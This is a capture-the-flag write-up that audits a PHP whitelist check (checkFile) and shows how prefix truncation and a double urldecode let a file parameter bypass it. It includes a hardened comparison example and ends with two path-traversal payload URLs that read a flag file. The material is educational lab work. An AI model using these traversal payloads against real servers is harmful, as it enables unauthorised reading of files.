Opening the page shows nothing but an image. Pressing F12 to view the page source reveals a comment pointing to source.php.
Visiting source.php:
Following the code, hint.php is checked next; it says the flag is in ffffllllaaaagggg.
Code audit:
    <?php
    // The class and method header are restored from the call site below
    // (emmm::checkFile); the body is the challenge's own code.
    class emmm
    {
        public static function checkFile($page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }
            // Check 1: the whole string must equal a whitelisted file name.
            if (in_array($page, $whitelist)) {
                return true;
            }
            // Check 2: only the part before the first '?' is compared;
            // the rest of the string is never looked at.
            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            // Check 3: the same truncation after an extra urldecode() pass.
            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }
From the four if conditions:
1. source.php and hint.php are the only names accepted outright.
2. $_page is the substring of page from offset 0 up to the first '?', so only that prefix is validated.
3. $page is URL-decoded once more before the same prefix check is repeated.
    // Caller: the original, untruncated request value is what gets included.
    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    }
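To make the audit finding concrete from the defender's side, the following is an added example and not part of the writeup or the challenge source. It mirrors the logic of emmm::checkFile() quoted above (minus the echo messages) and places a hardened resolver next to it; the class emmm_hardened, the function resolvePage(), and the sample inputs (including the placeholder target example.txt) are assumptions made for this example. The root cause it demonstrates is that checkFile() validates a truncated copy of the input while the caller includes the full string, so the string that is checked and the string that is used are not the same.

```php
<?php
// Added example, not the challenge's own code.

class emmm {
    // Logic of the challenge's checkFile(), reproduced for comparison.
    public static function checkFile($page) {
        $whitelist = ["source" => "source.php", "hint" => "hint.php"];
        if (!isset($page) || !is_string($page)) {
            return false;
        }
        if (in_array($page, $whitelist)) {
            return true;
        }
        // Defect 1: only the prefix before the first '?' is validated,
        // but the caller later includes the whole string.
        $_page = mb_substr($page, 0, mb_strpos($page . '?', '?'));
        if (in_array($_page, $whitelist)) {
            return true;
        }
        // Defect 2: a second decoding pass. The web server already decoded
        // the query once, so "%3f" in $_REQUEST becomes "?" here.
        $_page = urldecode($page);
        $_page = mb_substr($_page, 0, mb_strpos($_page . '?', '?'));
        return in_array($_page, $whitelist);
    }
}

class emmm_hardened {
    // Assumed hardened form: user input is only ever used as an array KEY,
    // and the value we return (our own constant) is what the caller includes.
    private const PAGES = ["source" => "source.php", "hint" => "hint.php"];

    public static function resolvePage($page): ?string {
        if (!is_string($page) || !array_key_exists($page, self::PAGES)) {
            return null;   // unknown key: refuse, no decoding, no truncation
        }
        return __DIR__ . '/' . self::PAGES[$page];
    }
}

// Constructed vectors: legitimate requests plus the two input shapes the audit
// identified (a literal '?' and a once-decoded '%3f'), aimed at a placeholder.
$vectors = [
    "source",                           // page name: what the hardened form expects
    "source.php",                       // file name: what the original accepts
    "hint.php?/../../example.txt",      // prefix check (Defect 1)
    "source.php%3f../../example.txt",   // extra urldecode (Defect 2)
];
foreach ($vectors as $v) {
    printf("%-34s original: %-5s hardened: %s\n",
        $v,
        emmm::checkFile($v) ? "true" : "false",
        emmm_hardened::resolvePage($v) === null ? "reject" : "accept");
}
```

Running it shows the original returning true for the last three inputs while the hardened resolver accepts only the bare key "source". The fix is not a better string filter: it is that the value passed to include comes from the server's own table, so whatever the client sends can only select an entry, never shape a path.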
The file parameter in the request can use ../../ to step up through directories and read the flag. You could add one ../ at a time, but I noticed every letter in ffffllllaaaagggg is repeated four times, so it is probably four levels up; I tried that directly.
Payload:
http://******/source.php?file=hint.php?/../../../../ffffllllaaaagggg
or:
http://******/source.php?file=source.php%253f../../../../../ffffllllaaaagggg
(the double URL encoding of ? is %253f)
The flag appears.